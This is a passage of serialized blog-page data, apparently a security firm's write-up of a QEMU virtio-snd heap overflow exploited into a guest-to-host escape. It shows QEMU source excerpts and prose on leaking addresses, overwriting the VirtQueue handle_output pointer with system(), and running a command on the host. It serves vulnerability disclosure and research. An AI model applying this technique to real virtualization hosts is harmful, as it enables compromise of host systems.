iov_to_buf",{"type":27,"tag":207,"props":138068,"children":138069},{"style":238},[138070],{"type":33,"value":1343},{"type":27,"tag":207,"props":138072,"children":138073},{"style":220},[138074],{"type":33,"value":59300},{"type":27,"tag":207,"props":138076,"children":138077},{"style":238},[138078],{"type":33,"value":8968},{"type":27,"tag":207,"props":138080,"children":138081},{"style":220},[138082],{"type":33,"value":131612},{"type":27,"tag":207,"props":138084,"children":138085},{"style":238},[138086],{"type":33,"value":1842},{"type":27,"tag":207,"props":138088,"children":138089},{"class":209,"line":5466},[138090,138095,138099,138104],{"type":27,"tag":207,"props":138091,"children":138092},{"style":220},[138093],{"type":33,"value":138094}," elem",{"type":27,"tag":207,"props":138096,"children":138097},{"style":238},[138098],{"type":33,"value":8968},{"type":27,"tag":207,"props":138100,"children":138101},{"style":220},[138102],{"type":33,"value":138103},"out_num",{"type":27,"tag":207,"props":138105,"children":138106},{"style":238},[138107],{"type":33,"value":1842},{"type":27,"tag":207,"props":138109,"children":138110},{"class":209,"line":5530},[138111,138116],{"type":27,"tag":207,"props":138112,"children":138113},{"style":232},[138114],{"type":33,"value":138115}," 0",{"type":27,"tag":207,"props":138117,"children":138118},{"style":238},[138119],{"type":33,"value":1842},{"type":27,"tag":207,"props":138121,"children":138122},{"class":209,"line":7900},[138123,138128],{"type":27,"tag":207,"props":138124,"children":138125},{"style":226},[138126],{"type":33,"value":138127}," &",{"type":27,"tag":207,"props":138129,"children":138130},{"style":238},[138131],{"type":33,"value":138132},"hdr,\n",{"type":27,"tag":207,"props":138134,"children":138135},{"class":209,"line":7909},[138136,138141],{"type":27,"tag":207,"props":138137,"children":138138},{"style":214},[138139],{"type":33,"value":138140}," sizeof",{"type":27,"tag":207,"props":138142,"children":138143},{"style":238},[138144],{"type":33,"value":138145},"(virtio_snd_pcm_xfer));\n",{"type":27,"tag":207,"props":138147,"children":138148},{"class":209,"line":7917},[138149,138153,138158,138162,138167],{"type":27,"tag":207,"props":138150,"children":138151},{"style":376},[138152],{"type":33,"value":10562},{"type":27,"tag":207,"props":138154,"children":138155},{"style":238},[138156],{"type":33,"value":138157}," (msg_sz ",{"type":27,"tag":207,"props":138159,"children":138160},{"style":226},[138161],{"type":33,"value":22963},{"type":27,"tag":207,"props":138163,"children":138164},{"style":214},[138165],{"type":33,"value":138166}," sizeof",{"type":27,"tag":207,"props":138168,"children":138169},{"style":238},[138170],{"type":33,"value":138171},"(virtio_snd_pcm_xfer)) {\n",{"type":27,"tag":207,"props":138173,"children":138174},{"class":209,"line":7926},[138175,138179],{"type":27,"tag":207,"props":138176,"children":138177},{"style":376},[138178],{"type":33,"value":67781},{"type":27,"tag":207,"props":138180,"children":138181},{"style":238},[138182],{"type":33,"value":138183}," rx_err;\n",{"type":27,"tag":207,"props":138185,"children":138186},{"class":209,"line":7934},[138187],{"type":27,"tag":207,"props":138188,"children":138189},{"style":238},[138190],{"type":33,"value":10637},{"type":27,"tag":207,"props":138192,"children":138193},{"class":209,"line":7943},[138194,138199,138203,138207,138211,138216,138220,138225],{"type":27,"tag":207,"props":138195,"children":138196},{"style":238},[138197],{"type":33,"value":138198}," stream_id ",{"type":27,"tag":207,"props":138200,"children":138201},{"style":226},[138202],{"type":33,"value":10380},{"type":27,"tag":207,"props":138204,"children":138205},{"style":1335},[138206],{"type":33,"value":133072},{"type":27,"tag":207,"props":138208,"children":138209},{"style":238},[138210],{"type":33,"value":1343},{"type":27,"tag":207,"props":138212,"children":138213},{"style":220},[138214],{"type":33,"value":138215},"hdr",{"type":27,"tag":207,"props":138217,"children":138218},{"style":238},[138219],{"type":33,"value":1041},{"type":27,"tag":207,"props":138221,"children":138222},{"style":220},[138223],{"type":33,"value":138224},"stream_id",{"type":27,"tag":207,"props":138226,"children":138227},{"style":238},[138228],{"type":33,"value":1455},{"type":27,"tag":207,"props":138230,"children":138231},{"class":209,"line":7952},[138232],{"type":27,"tag":207,"props":138233,"children":138234},{"emptyLinePlaceholder":19},[138235],{"type":33,"value":2062},{"type":27,"tag":207,"props":138237,"children":138238},{"class":209,"line":7961},[138239],{"type":27,"tag":207,"props":138240,"children":138241},{"style":238},[138242],{"type":33,"value":131241},{"type":27,"tag":207,"props":138244,"children":138245},{"class":209,"line":7969},[138246],{"type":27,"tag":207,"props":138247,"children":138248},{"emptyLinePlaceholder":19},[138249],{"type":33,"value":2062},{"type":27,"tag":207,"props":138251,"children":138252},{"class":209,"line":7978},[138253,138257,138261,138265,138269,138273,138277],{"type":27,"tag":207,"props":138254,"children":138255},{"style":1335},[138256],{"type":33,"value":131256},{"type":27,"tag":207,"props":138258,"children":138259},{"style":238},[138260],{"type":33,"value":1343},{"type":27,"tag":207,"props":138262,"children":138263},{"style":226},[138264],{"type":33,"value":10398},{"type":27,"tag":207,"props":138266,"children":138267},{"style":220},[138268],{"type":33,"value":43511},{"type":27,"tag":207,"props":138270,"children":138271},{"style":238},[138272],{"type":33,"value":8968},{"type":27,"tag":207,"props":138274,"children":138275},{"style":220},[138276],{"type":33,"value":131277},{"type":27,"tag":207,"props":138278,"children":138279},{"style":238},[138280],{"type":33,"value":1424},{"type":27,"tag":207,"props":138282,"children":138283},{"class":209,"line":7987},[138284,138288,138292,138296,138300,138304,138308,138312,138316,138320,138324,138328,138332],{"type":27,"tag":207,"props":138285,"children":138286},{"style":238},[138287],{"type":33,"value":131289},{"type":27,"tag":207,"props":138289,"children":138290},{"style":226},[138291],{"type":33,"value":10380},{"type":27,"tag":207,"props":138293,"children":138294},{"style":1335},[138295],{"type":33,"value":131298},{"type":27,"tag":207,"props":138297,"children":138298},{"style":238},[138299],{"type":33,"value":1343},{"type":27,"tag":207,"props":138301,"children":138302},{"style":220},[138303],{"type":33,"value":59300},{"type":27,"tag":207,"props":138305,"children":138306},{"style":238},[138307],{"type":33,"value":8968},{"type":27,"tag":207,"props":138309,"children":138310},{"style":220},[138311],{"type":33,"value":131315},{"type":27,"tag":207,"props":138313,"children":138314},{"style":238},[138315],{"type":33,"value":1123},{"type":27,"tag":207,"props":138317,"children":138318},{"style":220},[138319],{"type":33,"value":59300},{"type":27,"tag":207,"props":138321,"children":138322},{"style":238},[138323],{"type":33,"value":8968},{"type":27,"tag":207,"props":138325,"children":138326},{"style":220},[138327],{"type":33,"value":131332},{"type":27,"tag":207,"props":138329,"children":138330},{"style":238},[138331],{"type":33,"value":2222},{"type":27,"tag":207,"props":138333,"children":138334},{"style":226},[138335],{"type":33,"value":58100},{"type":27,"tag":207,"props":138337,"children":138338},{"class":209,"line":7996},[138339,138343],{"type":27,"tag":207,"props":138340,"children":138341},{"style":214},[138342],{"type":33,"value":131348},{"type":27,"tag":207,"props":138344,"children":138345},{"style":238},[138346],{"type":33,"value":138347},"(virtio_snd_pcm_status);\n",{"type":27,"tag":207,"props":138349,"children":138350},{"class":209,"line":8005},[138351,138355,138359,138363,138367,138371,138375,138379,138384],{"type":27,"tag":207,"props":138352,"children":138353},{"style":238},[138354],{"type":33,"value":131366},{"type":27,"tag":207,"props":138356,"children":138357},{"style":226},[138358],{"type":33,"value":10380},{"type":27,"tag":207,"props":138360,"children":138361},{"style":1335},[138362],{"type":33,"value":131375},{"type":27,"tag":207,"props":138364,"children":138365},{"style":238},[138366],{"type":33,"value":1343},{"type":27,"tag":207,"props":138368,"children":138369},{"style":214},[138370],{"type":33,"value":62563},{"type":27,"tag":207,"props":138372,"children":138373},{"style":238},[138374],{"type":33,"value":131388},{"type":27,"tag":207,"props":138376,"children":138377},{"style":226},[138378],{"type":33,"value":2227},{"type":27,"tag":207,"props":138380,"children":138381},{"style":238},[138382],{"type":33,"value":138383}," size);",{"type":27,"tag":207,"props":138385,"children":138386},{"style":4647},[138387],{"type":33,"value":138388}," // [1]\n",{"type":27,"tag":207,"props":138390,"children":138391},{"class":209,"line":8013},[138392,138396,138400,138404,138408],{"type":27,"tag":207,"props":138393,"children":138394},{"style":220},[138395],{"type":33,"value":131405},{"type":27,"tag":207,"props":138397,"children":138398},{"style":238},[138399],{"type":33,"value":8968},{"type":27,"tag":207,"props":138401,"children":138402},{"style":220},[138403],{"type":33,"value":59300},{"type":27,"tag":207,"props":138405,"children":138406},{"style":226},[138407],{"type":33,"value":229},{"type":27,"tag":207,"props":138409,"children":138410},{"style":238},[138411],{"type":33,"value":131422},{"type":27,"tag":207,"props":138413,"children":138414},{"class":209,"line":8021},[138415,138419,138423,138427,138431,138436],{"type":27,"tag":207,"props":138416,"children":138417},{"style":220},[138418],{"type":33,"value":131405},{"type":27,"tag":207,"props":138420,"children":138421},{"style":238},[138422],{"type":33,"value":8968},{"type":27,"tag":207,"props":138424,"children":138425},{"style":220},[138426],{"type":33,"value":131074},{"type":27,"tag":207,"props":138428,"children":138429},{"style":226},[138430],{"type":33,"value":229},{"type":27,"tag":207,"props":138432,"children":138433},{"style":238},[138434],{"type":33,"value":138435}," vq;",{"type":27,"tag":207,"props":138437,"children":138438},{"style":4647},[138439],{"type":33,"value":138440}," // [2]\n",{"type":27,"tag":207,"props":138442,"children":138443},{"class":209,"line":8029},[138444,138448,138452,138456,138460,138464],{"type":27,"tag":207,"props":138445,"children":138446},{"style":220},[138447],{"type":33,"value":131405},{"type":27,"tag":207,"props":138449,"children":138450},{"style":238},[138451],{"type":33,"value":8968},{"type":27,"tag":207,"props":138453,"children":138454},{"style":220},[138455],{"type":33,"value":131462},{"type":27,"tag":207,"props":138457,"children":138458},{"style":226},[138459],{"type":33,"value":229},{"type":27,"tag":207,"props":138461,"children":138462},{"style":232},[138463],{"type":33,"value":4680},{"type":27,"tag":207,"props":138465,"children":138466},{"style":238},[138467],{"type":33,"value":241},{"type":27,"tag":207,"props":138469,"children":138470},{"class":209,"line":8037},[138471,138475,138479,138483,138487,138491],{"type":27,"tag":207,"props":138472,"children":138473},{"style":220},[138474],{"type":33,"value":131405},{"type":27,"tag":207,"props":138476,"children":138477},{"style":238},[138478],{"type":33,"value":8968},{"type":27,"tag":207,"props":138480,"children":138481},{"style":220},[138482],{"type":33,"value":21177},{"type":27,"tag":207,"props":138484,"children":138485},{"style":226},[138486],{"type":33,"value":229},{"type":27,"tag":207,"props":138488,"children":138489},{"style":232},[138490],{"type":33,"value":4680},{"type":27,"tag":207,"props":138492,"children":138493},{"style":238},[138494],{"type":33,"value":241},{"type":27,"tag":207,"props":138496,"children":138497},{"class":209,"line":8046},[138498,138502,138506,138510,138514,138518,138522],{"type":27,"tag":207,"props":138499,"children":138500},{"style":1335},[138501],{"type":33,"value":131509},{"type":27,"tag":207,"props":138503,"children":138504},{"style":238},[138505],{"type":33,"value":1343},{"type":27,"tag":207,"props":138507,"children":138508},{"style":226},[138509],{"type":33,"value":10398},{"type":27,"tag":207,"props":138511,"children":138512},{"style":220},[138513],{"type":33,"value":43511},{"type":27,"tag":207,"props":138515,"children":138516},{"style":238},[138517],{"type":33,"value":8968},{"type":27,"tag":207,"props":138519,"children":138520},{"style":220},[138521],{"type":33,"value":131530},{"type":27,"tag":207,"props":138523,"children":138524},{"style":238},[138525],{"type":33,"value":138526},", buffer, entry);\n",{"type":27,"tag":207,"props":138528,"children":138529},{"class":209,"line":8055},[138530],{"type":27,"tag":207,"props":138531,"children":138532},{"style":238},[138533],{"type":33,"value":10637},{"type":27,"tag":36,"props":138535,"children":138536},{},[138537,138538,138543,138545,138550,138552,138557,138559,138565],{"type":33,"value":131584},{"type":27,"tag":84,"props":138539,"children":138541},{"className":138540},[],[138542],{"type":33,"value":131590},{"type":33,"value":138544},", QEMU allocates a ",{"type":27,"tag":84,"props":138546,"children":138548},{"className":138547},[],[138549],{"type":33,"value":131727},{"type":33,"value":138551}," whose size depends on the guest-provided iovec, and at ",{"type":27,"tag":84,"props":138553,"children":138555},{"className":138554},[],[138556],{"type":33,"value":131625},{"type":33,"value":138558}," it stores the ",{"type":27,"tag":84,"props":138560,"children":138562},{"className":138561},[],[138563],{"type":33,"value":138564},"VirtQueue *vq",{"type":33,"value":138566}," pointer into the buffer.",{"type":27,"tag":36,"props":138568,"children":138569},{},[138570,138571,138577],{"type":33,"value":71449},{"type":27,"tag":84,"props":138572,"children":138574},{"className":138573},[],[138575],{"type":33,"value":138576},"VirtQueue",{"type":33,"value":138578}," structure contains some useful fields:",{"type":27,"tag":101,"props":138580,"children":138582},{"code":138581,"language":10435,"meta":7,"className":23789,"style":7},"struct VirtQueue\n{\n [...]\n\n VirtIOHandleOutput handle_output;\n VirtIODevice *vdev;\n\n [...]\n};\n",[138583],{"type":27,"tag":84,"props":138584,"children":138585},{"__ignoreMap":7},[138586,138598,138605,138612,138619,138627,138644,138651,138658],{"type":27,"tag":207,"props":138587,"children":138588},{"class":209,"line":210},[138589,138593],{"type":27,"tag":207,"props":138590,"children":138591},{"style":214},[138592],{"type":33,"value":16677},{"type":27,"tag":207,"props":138594,"children":138595},{"style":238},[138596],{"type":33,"value":138597}," VirtQueue\n",{"type":27,"tag":207,"props":138599,"children":138600},{"class":209,"line":244},[138601],{"type":27,"tag":207,"props":138602,"children":138603},{"style":238},[138604],{"type":33,"value":18158},{"type":27,"tag":207,"props":138606,"children":138607},{"class":209,"line":270},[138608],{"type":27,"tag":207,"props":138609,"children":138610},{"style":238},[138611],{"type":33,"value":112006},{"type":27,"tag":207,"props":138613,"children":138614},{"class":209,"line":296},[138615],{"type":27,"tag":207,"props":138616,"children":138617},{"emptyLinePlaceholder":19},[138618],{"type":33,"value":2062},{"type":27,"tag":207,"props":138620,"children":138621},{"class":209,"line":445},[138622],{"type":27,"tag":207,"props":138623,"children":138624},{"style":238},[138625],{"type":33,"value":138626}," VirtIOHandleOutput handle_output;\n",{"type":27,"tag":207,"props":138628,"children":138629},{"class":209,"line":867},[138630,138635,138639],{"type":27,"tag":207,"props":138631,"children":138632},{"style":238},[138633],{"type":33,"value":138634}," VirtIODevice ",{"type":27,"tag":207,"props":138636,"children":138637},{"style":226},[138638],{"type":33,"value":9286},{"type":27,"tag":207,"props":138640,"children":138641},{"style":238},[138642],{"type":33,"value":138643},"vdev;\n",{"type":27,"tag":207,"props":138645,"children":138646},{"class":209,"line":892},[138647],{"type":27,"tag":207,"props":138648,"children":138649},{"emptyLinePlaceholder":19},[138650],{"type":33,"value":2062},{"type":27,"tag":207,"props":138652,"children":138653},{"class":209,"line":1475},[138654],{"type":27,"tag":207,"props":138655,"children":138656},{"style":238},[138657],{"type":33,"value":112006},{"type":27,"tag":207,"props":138659,"children":138660},{"class":209,"line":2065},[138661],{"type":27,"tag":207,"props":138662,"children":138663},{"style":238},[138664],{"type":33,"value":23852},{"type":27,"tag":36,"props":138666,"children":138667},{},[138668,138669,138675,138677,138683],{"type":33,"value":23888},{"type":27,"tag":84,"props":138670,"children":138672},{"className":138671},[],[138673],{"type":33,"value":138674},".handle_output",{"type":33,"value":138676}," field is a callback, specifically a function pointer that gets called when the virtqueue receives a notification from the guest, and ",{"type":27,"tag":84,"props":138678,"children":138680},{"className":138679},[],[138681],{"type":33,"value":138682},".vdev",{"type":33,"value":138684}," is the pointer passed to it as the first argument:",{"type":27,"tag":101,"props":138686,"children":138688},{"code":138687,"language":10435,"meta":7,"className":23789,"style":7},"static void virtio_queue_notify_vq(VirtQueue *vq)\n{\n if (vq->vring.desc && vq->handle_output) {\n VirtIODevice *vdev = vq->vdev;\n\n [...]\n\n vq->handle_output(vdev, vq);\n\n [...]\n }\n}\n",[138689],{"type":27,"tag":84,"props":138690,"children":138691},{"__ignoreMap":7},[138692,138725,138732,138787,138824,138831,138838,138845,138866,138873,138880,138887],{"type":27,"tag":207,"props":138693,"children":138694},{"class":209,"line":210},[138695,138699,138703,138708,138713,138717,138721],{"type":27,"tag":207,"props":138696,"children":138697},{"style":214},[138698],{"type":33,"value":58283},{"type":27,"tag":207,"props":138700,"children":138701},{"style":214},[138702],{"type":33,"value":58288},{"type":27,"tag":207,"props":138704,"children":138705},{"style":1335},[138706],{"type":33,"value":138707}," virtio_queue_notify_vq",{"type":27,"tag":207,"props":138709,"children":138710},{"style":238},[138711],{"type":33,"value":138712},"(VirtQueue ",{"type":27,"tag":207,"props":138714,"children":138715},{"style":226},[138716],{"type":33,"value":9286},{"type":27,"tag":207,"props":138718,"children":138719},{"style":220},[138720],{"type":33,"value":131074},{"type":27,"tag":207,"props":138722,"children":138723},{"style":238},[138724],{"type":33,"value":10449},{"type":27,"tag":207,"props":138726,"children":138727},{"class":209,"line":244},[138728],{"type":27,"tag":207,"props":138729,"children":138730},{"style":238},[138731],{"type":33,"value":18158},{"type":27,"tag":207,"props":138733,"children":138734},{"class":209,"line":270},[138735,138739,138743,138747,138751,138756,138760,138765,138769,138774,138778,138783],{"type":27,"tag":207,"props":138736,"children":138737},{"style":376},[138738],{"type":33,"value":19556},{"type":27,"tag":207,"props":138740,"children":138741},{"style":238},[138742],{"type":33,"value":686},{"type":27,"tag":207,"props":138744,"children":138745},{"style":220},[138746],{"type":33,"value":131074},{"type":27,"tag":207,"props":138748,"children":138749},{"style":238},[138750],{"type":33,"value":8968},{"type":27,"tag":207,"props":138752,"children":138753},{"style":220},[138754],{"type":33,"value":138755},"vring",{"type":27,"tag":207,"props":138757,"children":138758},{"style":238},[138759],{"type":33,"value":1041},{"type":27,"tag":207,"props":138761,"children":138762},{"style":220},[138763],{"type":33,"value":138764},"desc",{"type":27,"tag":207,"props":138766,"children":138767},{"style":226},[138768],{"type":33,"value":21461},{"type":27,"tag":207,"props":138770,"children":138771},{"style":220},[138772],{"type":33,"value":138773}," vq",{"type":27,"tag":207,"props":138775,"children":138776},{"style":238},[138777],{"type":33,"value":8968},{"type":27,"tag":207,"props":138779,"children":138780},{"style":220},[138781],{"type":33,"value":138782},"handle_output",{"type":27,"tag":207,"props":138784,"children":138785},{"style":238},[138786],{"type":33,"value":1424},{"type":27,"tag":207,"props":138788,"children":138789},{"class":209,"line":296},[138790,138795,138799,138804,138808,138812,138816,138820],{"type":27,"tag":207,"props":138791,"children":138792},{"style":238},[138793],{"type":33,"value":138794}," VirtIODevice ",{"type":27,"tag":207,"props":138796,"children":138797},{"style":226},[138798],{"type":33,"value":9286},{"type":27,"tag":207,"props":138800,"children":138801},{"style":238},[138802],{"type":33,"value":138803},"vdev ",{"type":27,"tag":207,"props":138805,"children":138806},{"style":226},[138807],{"type":33,"value":10380},{"type":27,"tag":207,"props":138809,"children":138810},{"style":220},[138811],{"type":33,"value":138773},{"type":27,"tag":207,"props":138813,"children":138814},{"style":238},[138815],{"type":33,"value":8968},{"type":27,"tag":207,"props":138817,"children":138818},{"style":220},[138819],{"type":33,"value":131060},{"type":27,"tag":207,"props":138821,"children":138822},{"style":238},[138823],{"type":33,"value":241},{"type":27,"tag":207,"props":138825,"children":138826},{"class":209,"line":445},[138827],{"type":27,"tag":207,"props":138828,"children":138829},{"emptyLinePlaceholder":19},[138830],{"type":33,"value":2062},{"type":27,"tag":207,"props":138832,"children":138833},{"class":209,"line":867},[138834],{"type":27,"tag":207,"props":138835,"children":138836},{"style":238},[138837],{"type":33,"value":131241},{"type":27,"tag":207,"props":138839,"children":138840},{"class":209,"line":892},[138841],{"type":27,"tag":207,"props":138842,"children":138843},{"emptyLinePlaceholder":19},[138844],{"type":33,"value":2062},{"type":27,"tag":207,"props":138846,"children":138847},{"class":209,"line":1475},[138848,138853,138857,138861],{"type":27,"tag":207,"props":138849,"children":138850},{"style":220},[138851],{"type":33,"value":138852}," vq",{"type":27,"tag":207,"props":138854,"children":138855},{"style":238},[138856],{"type":33,"value":8968},{"type":27,"tag":207,"props":138858,"children":138859},{"style":1335},[138860],{"type":33,"value":138782},{"type":27,"tag":207,"props":138862,"children":138863},{"style":238},[138864],{"type":33,"value":138865},"(vdev, vq);\n",{"type":27,"tag":207,"props":138867,"children":138868},{"class":209,"line":2065},[138869],{"type":27,"tag":207,"props":138870,"children":138871},{"emptyLinePlaceholder":19},[138872],{"type":33,"value":2062},{"type":27,"tag":207,"props":138874,"children":138875},{"class":209,"line":2092},[138876],{"type":27,"tag":207,"props":138877,"children":138878},{"style":238},[138879],{"type":33,"value":131241},{"type":27,"tag":207,"props":138881,"children":138882},{"class":209,"line":2130},[138883],{"type":27,"tag":207,"props":138884,"children":138885},{"style":238},[138886],{"type":33,"value":10645},{"type":27,"tag":207,"props":138888,"children":138889},{"class":209,"line":2168},[138890],{"type":27,"tag":207,"props":138891,"children":138892},{"style":238},[138893],{"type":33,"value":451},{"type":27,"tag":36,"props":138895,"children":138896},{},[138897,138899,138904,138906,138911,138913,138919,138921,138926,138927,138932,138934,138939],{"type":33,"value":138898},"This means that if we free the known-address chunk and replace it with a ",{"type":27,"tag":84,"props":138900,"children":138902},{"className":138901},[],[138903],{"type":33,"value":131727},{"type":33,"value":138905}," - which is straightforward, since we control the buffer allocation size through the ",{"type":27,"tag":84,"props":138907,"children":138909},{"className":138908},[],[138910],{"type":33,"value":131315},{"type":33,"value":138912}," iovec - we can use the arbitrary read primitive to read its ",{"type":27,"tag":84,"props":138914,"children":138916},{"className":138915},[],[138917],{"type":33,"value":138918},".vq",{"type":33,"value":138920}," pointer, then follow that pointer to leak ",{"type":27,"tag":84,"props":138922,"children":138924},{"className":138923},[],[138925],{"type":33,"value":138674},{"type":33,"value":23328},{"type":27,"tag":84,"props":138928,"children":138930},{"className":138929},[],[138931],{"type":33,"value":138576},{"type":33,"value":138933}," structure. In our case, that field points to ",{"type":27,"tag":84,"props":138935,"children":138937},{"className":138936},[],[138938],{"type":33,"value":130967},{"type":33,"value":138940},", which gives us QEMU's base address.",{"type":27,"tag":36,"props":138942,"children":138943},{},[138944,138946,138952],{"type":33,"value":138945},"From there, we can use the arbitrary read primitive once more to read a resolved entry from QEMU's GOT, leaking a libc address. With that, we can compute the address of ",{"type":27,"tag":84,"props":138947,"children":138949},{"className":138948},[],[138950],{"type":33,"value":138951},"system",{"type":33,"value":1041},{"type":27,"tag":58,"props":138954,"children":138956},{"id":138955},"rip-control",[138957],{"type":33,"value":138958},"RIP Control",{"type":27,"tag":36,"props":138960,"children":138961},{},[138962,138964,138969,138971,138977],{"type":33,"value":138963},"At this point, we have everything we need: an arbitrary read/write primitive, a QEMU code leak, and the address of ",{"type":27,"tag":84,"props":138965,"children":138967},{"className":138966},[],[138968],{"type":33,"value":138951},{"type":33,"value":138970},". To hijack control flow, we do not need to look far - we just described a function pointer on the heap at a known address: ",{"type":27,"tag":84,"props":138972,"children":138974},{"className":138973},[],[138975],{"type":33,"value":138976},"VirtQueue.handle_output",{"type":33,"value":1041},{"type":27,"tag":36,"props":138979,"children":138980},{},[138981,138983,138988,138990,138995,138997,139002],{"type":33,"value":138982},"We overwrite ",{"type":27,"tag":84,"props":138984,"children":138986},{"className":138985},[],[138987],{"type":33,"value":138674},{"type":33,"value":138989}," with the address of ",{"type":27,"tag":84,"props":138991,"children":138993},{"className":138992},[],[138994],{"type":33,"value":138951},{"type":33,"value":138996}," and write the command string we want to execute into memory using our arbitrary write. Then we overwrite ",{"type":27,"tag":84,"props":138998,"children":139000},{"className":138999},[],[139001],{"type":33,"value":138682},{"type":33,"value":139003}," with the address of that command string, so it is passed as the first argument.",{"type":27,"tag":36,"props":139005,"children":139006},{},[139007,139009,139015,139017,139023,139025,139031],{"type":33,"value":139008},"Then, we simply notify the virtqueue from the guest. QEMU enters ",{"type":27,"tag":84,"props":139010,"children":139012},{"className":139011},[],[139013],{"type":33,"value":139014},"virtio_queue_notify_vq",{"type":33,"value":139016},", which calls ",{"type":27,"tag":84,"props":139018,"children":139020},{"className":139019},[],[139021],{"type":33,"value":139022},"vq->handle_output(vq->vdev)",{"type":33,"value":139024}," - or, after our overwrites, ",{"type":27,"tag":84,"props":139026,"children":139028},{"className":139027},[],[139029],{"type":33,"value":139030},"system(command)",{"type":33,"value":1041},{"type":27,"tag":36,"props":139033,"children":139034},{},[139035,139037,139043,139045],{"type":33,"value":139036},"Finally, with all of this, we achieve a reliable guest-to-host escape and execute ",{"type":27,"tag":84,"props":139038,"children":139040},{"className":139039},[],[139041],{"type":33,"value":139042},"gnome-calculator",{"type":33,"value":139044}," on the host system:\n",{"type":27,"tag":38230,"props":139046,"children":139047},{},[],{"type":27,"tag":10222,"props":139049,"children":139053},{"className":139050,"dataMediaMaxWidth":139052},[139051],"twitter-tweet","560",[139054,139078,139089,139092,139095,139096],{"type":27,"tag":36,"props":139055,"children":139058},{"lang":139056,"dir":139057},"en","ltr",[139059,139061,139064,139067,139069,139072,139073,139076],{"type":33,"value":139060},"We recently achieved guest-to-host escape by exploiting a QEMU 0day.",{"type":27,"tag":38230,"props":139062,"children":139063},{},[],{"type":27,"tag":38230,"props":139065,"children":139066},{},[],{"type":33,"value":139068},"We’ll share details on a new technique leveraging the latest glibc allocator behavior and what we believe is a novel QEMU-specific heap spray/RIP-control primitive.",{"type":27,"tag":38230,"props":139070,"children":139071},{},[],{"type":33,"value":13740},{"type":27,"tag":38230,"props":139074,"children":139075},{},[],{"type":33,"value":139077},"Writeup coming next week. ",{"type":27,"tag":207,"props":139079,"children":139082},{"className":139080},[139081],"tweet-attribution",[139083],{"type":27,"tag":47,"props":139084,"children":139086},{"href":139085},"https://twitter.com/osec_io/status/2029643325125390550?ref_src=twsrc%5Etfw",[139087],{"type":33,"value":139088},"— OtterSec (@osec_io) March 5, 2026",{"type":27,"tag":38230,"props":139090,"children":139091},{},[],{"type":27,"tag":38230,"props":139093,"children":139094},{},[],{"type":33,"value":10102},{"type":27,"tag":10096,"props":139097,"children":139099},{"controls":19,"width":139098},"100%",[139100,139102,139106],{"type":33,"value":139101},"\n ",{"type":27,"tag":9321,"props":139103,"children":139105},{"src":139104,"type":10106},"/posts/virtio-snd-qemu-0day/demo.mp4",[],{"type":33,"value":139107},"\n Your browser does not support the video tag.\n ",{"type":27,"tag":38230,"props":139109,"children":139110},{},[],{"type":27,"tag":36,"props":139112,"children":139113},{},[139114,139116,139122,139124,139130],{"type":33,"value":139115},"The final exploit, targeting QEMU commit ",{"type":27,"tag":84,"props":139117,"children":139119},{"className":139118},[],[139120],{"type":33,"value":139121},"ece408818d27f745ef1b05fb3cc99a1e7a5bf580",{"type":33,"value":139123}," (Feb 13, 2026) and the latest glibc 2.43, can be found ",{"type":27,"tag":47,"props":139125,"children":139128},{"href":139126,"rel":139127},"https://github.com/otter-sec/qemu-escape",[51],[139129],{"type":33,"value":54826},{"type":33,"value":1041},{"type":27,"tag":36,"props":139132,"children":139133},{},[139134,139136,139143],{"type":33,"value":139135},"Special thanks to ",{"type":27,"tag":47,"props":139137,"children":139140},{"href":139138,"rel":139139},"https://www.willsroot.io/",[51],[139141],{"type":33,"value":139142},"William Liu",{"type":33,"value":139144}," for proofreading this post and helping us polish it before publication.",{"type":27,"tag":28,"props":139146,"children":139147},{"id":10112},[139148],{"type":33,"value":10115},{"type":27,"tag":36,"props":139150,"children":139151},{},[139152],{"type":33,"value":139153},"Starting from a heap overflow where the written bytes are effectively random, we showed how careful heap grooming and a favorable change in glibc 2.43's allocator can turn even a single byte of uncontrolled corruption into a reliable guest-to-host escape.",{"type":27,"tag":36,"props":139155,"children":139156},{},[139157],{"type":33,"value":139158},"More broadly, this exploit is a reminder that weak-looking primitives should not be dismissed too quickly - with the right heap layout and target, even highly constrained corruption can be enough.",{"type":27,"tag":10127,"props":139160,"children":139161},{},[139162],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":139164},[139165,139168,139171,139180],{"id":130863,"depth":244,"text":130876,"children":139166},[139167],{"id":130884,"depth":270,"text":130887},{"id":130908,"depth":244,"text":130911,"children":139169},[139170],{"id":130922,"depth":270,"text":130922},{"id":107323,"depth":244,"text":107326,"children":139172},[139173,139174,139175,139176,139177,139178,139179],{"id":133512,"depth":270,"text":133515},{"id":135038,"depth":270,"text":135041},{"id":135832,"depth":270,"text":135835},{"id":136237,"depth":270,"text":136240},{"id":136453,"depth":270,"text":136456},{"id":136659,"depth":270,"text":136662},{"id":138955,"depth":270,"text":138958},{"id":10112,"depth":244,"text":10115},"content:blog:2026-03-17-virtio-snd-qemu-hypervisor-escape.md","blog/2026-03-17-virtio-snd-qemu-hypervisor-escape.md","blog/2026-03-17-virtio-snd-qemu-hypervisor-escape",{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"author":139185,"image":139186,"isFeatured":19,"onBlogPage":19,"tags":139187,"body":139188,"_type":10152,"_id":10153,"_source":10154,"_file":10155,"_stem":10156,"_extension":10157},[12,13,14],{"src":16,"width":17,"height":18},[21,22],{"type":24,"children":139189,"toc":148443},[139190,139194,139198,139208,139212,139222,139238,139245,139255,139261,139271,139275,139285,139295,139299,139309,139407,139411,139418,139422,139426,139442,139519,139526,139542,139552,139556,139560,139570,139684,139688,139692,139699,139703,139710,139732,139754,139764,139931,139935,139942,139957,139967,139971,139987,139997,140001,140005,140027,140055,140112,140116,140132,140136,140143,140153,140157,140164,140168,140201,140205,140215,140219,140385,140394,140401,140417,140438,140448,140452,140456,141070,141074,141081,141115,143074,143078,143085,143089,143117,143133,143299,143345,143367,143457,143461,144246,144250,144256,144266,146279,146283,146289,146293,146309,146319,146329,146339,146365,146369,146767,146789,146886,146901,147040,147044,147054,147319,147341,147362,147481,147491,147495,147633,147661,147671,147675,147785,147819,147883,147887,148404,148408,148418,148427,148431,148435,148439],{"type":27,"tag":28,"props":139191,"children":139192},{"id":30},[139193],{"type":33,"value":34},{"type":27,"tag":36,"props":139195,"children":139196},{},[139197],{"type":33,"value":40},{"type":27,"tag":36,"props":139199,"children":139200},{},[139201,139202,139207],{"type":33,"value":45},{"type":27,"tag":47,"props":139203,"children":139205},{"href":49,"rel":139204},[51],[139206],{"type":33,"value":54},{"type":33,"value":56},{"type":27,"tag":58,"props":139209,"children":139210},{"id":60},[139211],{"type":3